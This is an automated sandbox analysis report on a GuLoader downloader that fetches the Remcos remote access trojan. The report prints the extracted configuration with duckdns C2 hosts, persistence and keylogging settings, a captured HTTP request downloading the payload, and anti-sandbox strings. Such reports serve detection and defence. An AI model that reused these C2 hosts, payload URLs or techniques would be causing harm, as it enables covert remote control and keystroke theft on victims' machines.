Play interactive tour

Edit tour

Windows Analysis Report 466XoziOLD.exe

Overview

General Information

Sample Name:	466XoziOLD.exe
Analysis ID:	491189
MD5:	84ade48e59ed36c620d254d325f355d7
SHA1:	6e17eb18c64e00ca9831e940769da9c744a5d5e3
SHA256:	8060a88a8253eafc4c38d56d58d8470b98765308aeafc1e873b95011cbb8cadf
Tags:	exeRemcosRAT
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Potential malicious icon found

Multi AV Scanner detection for submitted file

GuLoader behavior detected

Yara detected Remcos RAT

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

C2 URLs / IPs found in malware configuration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Uses dynamic DNS services

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected TCP or UDP traffic on non-standard ports

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

466XoziOLD.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\466XoziOLD.exe' MD5: 84ADE48E59ED36C620D254D325F355D7)

466XoziOLD.exe (PID: 6324 cmdline: 'C:\Users\user\Desktop\466XoziOLD.exe' MD5: 84ADE48E59ED36C620D254D325F355D7)

cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://sopage.duckdns.org/Remcos_sgJ"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
Source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://sopage.duckdns.org/Remcos_sgJ"}

Multi AV Scanner detection for submitted file

Show sources

Source: 466XoziOLD.exe	Virustotal: Detection: 29%			Perma Link
Source: 466XoziOLD.exe	ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: 466XoziOLD.exe

Joe Sandbox ML: detected

Source: 466XoziOLD.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remocs 3.x Unencrypted Checkin 192.168.2.4:49829 -> 23.146.242.71:2404
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remocs 3.x Unencrypted Server Response 23.146.242.71:2404 -> 192.168.2.4:49829

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: solex-wave.duckdns.org
Source: Malware configuration extractor	URLs: http://sopage.duckdns.org/Remcos_sgJ

Uses dynamic DNS services

Show sources

Source: unknown	DNS query: name: sopage.duckdns.org
Source: unknown	DNS query: name: solex-wave.duckdns.org

Source: global traffic

HTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.2.4:49829 -> 23.146.242.71:2404

Source: Joe Sandbox View	ASN Name: VDI-NETWORKUS VDI-NETWORKUS
Source: Joe Sandbox View	ASN Name: VDI-NETWORKUS VDI-NETWORKUS

Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	String found in binary or memory: http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	String found in binary or memory: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	String found in binary or memory: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46

Source: unknown

DNS traffic detected: queries for: sopage.duckdns.org

Source: global traffic

HTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache

Source: 466XoziOLD.exe, 00000000.00000002.927536241.000000000073A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: 466XoziOLD.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 466XoziOLD.exe, 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
Source: 466XoziOLD.exe, 0000000E.00000000.925461157.0000000000430000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
Source: 466XoziOLD.exe	Binary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe

Source: 466XoziOLD.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8DCB9	0_2_02B8DCB9
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B88E84	0_2_02B88E84
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B80BAF	0_2_02B80BAF
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B89180	0_2_02B89180
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8CB37	0_2_02B8CB37
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8C8CE	0_2_02B8C8CE
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8D818	0_2_02B8D818
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8C81A	0_2_02B8C81A
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8B801	0_2_02B8B801
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8B950	0_2_02B8B950

Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B89180 NtAllocateVirtualMemory,LoadLibraryA,	0_2_02B89180
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8CB37 NtWriteVirtualMemory,LoadLibraryA,	0_2_02B8CB37
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8D75C NtProtectVirtualMemory,	0_2_02B8D75C
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8D818 NtWriteVirtualMemory,	0_2_02B8D818
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8C81A NtWriteVirtualMemory,	0_2_02B8C81A
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E5C9 NtProtectVirtualMemory,	14_2_0056E5C9
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E734 Sleep,NtProtectVirtualMemory,	14_2_0056E734
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E590 NtProtectVirtualMemory,	14_2_0056E590
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E608 NtProtectVirtualMemory,	14_2_0056E608
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E5B7 NtProtectVirtualMemory,	14_2_0056E5B7
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E5FD NtProtectVirtualMemory,	14_2_0056E5FD
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 14_2_0056E678 NtProtectVirtualMemory,	14_2_0056E678

Source: C:\Users\user\Desktop\466XoziOLD.exe

Process Stats: CPU usage > 98%

Source: 466XoziOLD.exe	Virustotal: Detection: 29%
Source: 466XoziOLD.exe	ReversingLabs: Detection: 17%

Source: 466XoziOLD.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\466XoziOLD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\466XoziOLD.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'	Jump to behavior

Source: C:\Users\user\Desktop\466XoziOLD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\466XoziOLD.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-Y0PK9D

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@3/0@2/2

Source: C:\Users\user\Desktop\466XoziOLD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00429D50 push dword ptr [edi+000000BCh]; retn 0010h	0_2_0042A039
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00405408 push es; ret	0_2_00405409
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_0040581D push edx; retf	0_2_0040581B
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00406233 pushfd ; iretd	0_2_00406234
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00406AF5 push eax; retf	0_2_00406AF6
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_004070B2 push esp; ret	0_2_004070D0
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00405F4E push edx; iretd	0_2_00405F4F
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00405B50 push cs; ret	0_2_00405B53
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00403BC7 push FFFFFFC2h; retf	0_2_00403C05
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00403FC9 push edx; rep ret	0_2_00403FE0
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_004057EB push edx; retf	0_2_0040581B
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_00405FFD push eax; iretd	0_2_00406009
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_0040579B push edx; retf	0_2_004057A7
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B85293 push ebp; retf	0_2_02B8529D

Source: initial sample

Static PE information: section name: .text entropy: 7.42071533983

Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\466XoziOLD.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://SOPAGE.DUCKDNS.ORG/REMCOS_S_BCHLCWVW46.BINHTTP://BACKUPSOLDYN.DUCKDNS.ORG/REMCOS_S_BCHLCWVW46.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp, 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\466XoziOLD.exe TID: 6556

Thread sleep count: 214 > 30

Jump to behavior

Source: C:\Users\user\Desktop\466XoziOLD.exe

System information queried: ModuleInformation

Jump to behavior

Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp, 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\466XoziOLD.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\466XoziOLD.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8CB37 mov eax, dword ptr fs:[00000030h]	0_2_02B8CB37
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B88CB6 mov eax, dword ptr fs:[00000030h]	0_2_02B88CB6
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8B2B7 mov eax, dword ptr fs:[00000030h]	0_2_02B8B2B7
Source: C:\Users\user\Desktop\466XoziOLD.exe	Code function: 0_2_02B8BAC8 mov eax, dword ptr fs:[00000030h]	0_2_02B8BAC8

Source: C:\Users\user\Desktop\466XoziOLD.exe

Code function: 0_2_02B890B9 LdrInitializeThunk,

0_2_02B890B9

Source: C:\Users\user\Desktop\466XoziOLD.exe

Process created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'

Jump to behavior

Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	Input Capture1	Security Software Discovery31	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery2	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
466XoziOLD.exe	30%	Virustotal	Browse
466XoziOLD.exe	18%	ReversingLabs
466XoziOLD.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://sopage.duckdns.org/Remcos_sgJ	0%	Avira URL Cloud	safe
http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46	0%	Avira URL Cloud	safe
http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin	0%	Avira URL Cloud	safe
http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin	0%	Avira URL Cloud	safe
solex-wave.duckdns.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sopage.duckdns.org	23.146.242.85	true	true		unknown
solex-wave.duckdns.org	23.146.242.71	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sopage.duckdns.org/Remcos_sgJ	true	Avira URL Cloud: safe	unknown
http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin	false	Avira URL Cloud: safe	unknown
solex-wave.duckdns.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46	466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin	466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.146.242.71	solex-wave.duckdns.org	Reserved		46664	VDI-NETWORKUS	true
23.146.242.85	sopage.duckdns.org	Reserved		46664	VDI-NETWORKUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491189
Start date:	27.09.2021
Start time:	10:54:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	466XoziOLD.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@3/0@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 34.7% (good quality ratio 9.5%) Quality average: 14.4% Quality standard deviation: 26.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
23.146.242.71	hVlpEajflR.exe	Get hash	malicious	Browse
23.146.242.71	http___sowork.duckdns.org_11d_solex.exe	Get hash	malicious	Browse
23.146.242.85	hVlpEajflR.exe	Get hash	malicious	Browse	spage.duckdns.org/Remcos_S_tGNeLX139.bin
	0rUkHCgvVf.exe	Get hash	malicious	Browse	dpage.duckdns.org/remcos_d_fIqfwC80.bin
	JQPFEy9Ekx.exe	Get hash	malicious	Browse	dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
	http___sowork.duckdns.org_11d_solex.exe	Get hash	malicious	Browse	sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VDI-NETWORKUS	hVlpEajflR.exe	Get hash	malicious	Browse	23.146.242.85
	0rUkHCgvVf.exe	Get hash	malicious	Browse	23.146.242.85
	HxXHmM0T9f.exe	Get hash	malicious	Browse	23.146.242.147
	JQPFEy9Ekx.exe	Get hash	malicious	Browse	23.146.242.85
	http___sowork.duckdns.org_11d_solex.exe	Get hash	malicious	Browse	23.146.242.85
	eXik5mFvet.exe	Get hash	malicious	Browse	23.146.242.94
	CVEXzxk43s.exe	Get hash	malicious	Browse	23.146.242.94
	yOCBr7SNLJ.exe	Get hash	malicious	Browse	23.146.242.94
	13FlI4deWN.exe	Get hash	malicious	Browse	23.146.242.94
	Payment Notification.exe	Get hash	malicious	Browse	23.146.242.147
	Payment Notification.scr.exe	Get hash	malicious	Browse	23.146.242.147
	Payment Notification.scr.exe	Get hash	malicious	Browse	23.146.242.147
	Request For Quotation.jar	Get hash	malicious	Browse	23.146.242.147
	OvBS76pTyX.exe	Get hash	malicious	Browse	23.146.242.94
	U6lqJJBG8S.exe	Get hash	malicious	Browse	23.146.242.94
	pNyAinWdWJ.exe	Get hash	malicious	Browse	23.146.242.94
	YTVrQC7FhG.exe	Get hash	malicious	Browse	23.146.242.94
	I4eRfFgJG7.exe	Get hash	malicious	Browse	23.146.242.94
	sLVCW67F5w.exe	Get hash	malicious	Browse	23.146.242.94
	http___s-rco.duckdns.org_11d_solex.exe	Get hash	malicious	Browse	23.146.242.94
VDI-NETWORKUS	hVlpEajflR.exe	Get hash	malicious	Browse	23.146.242.85
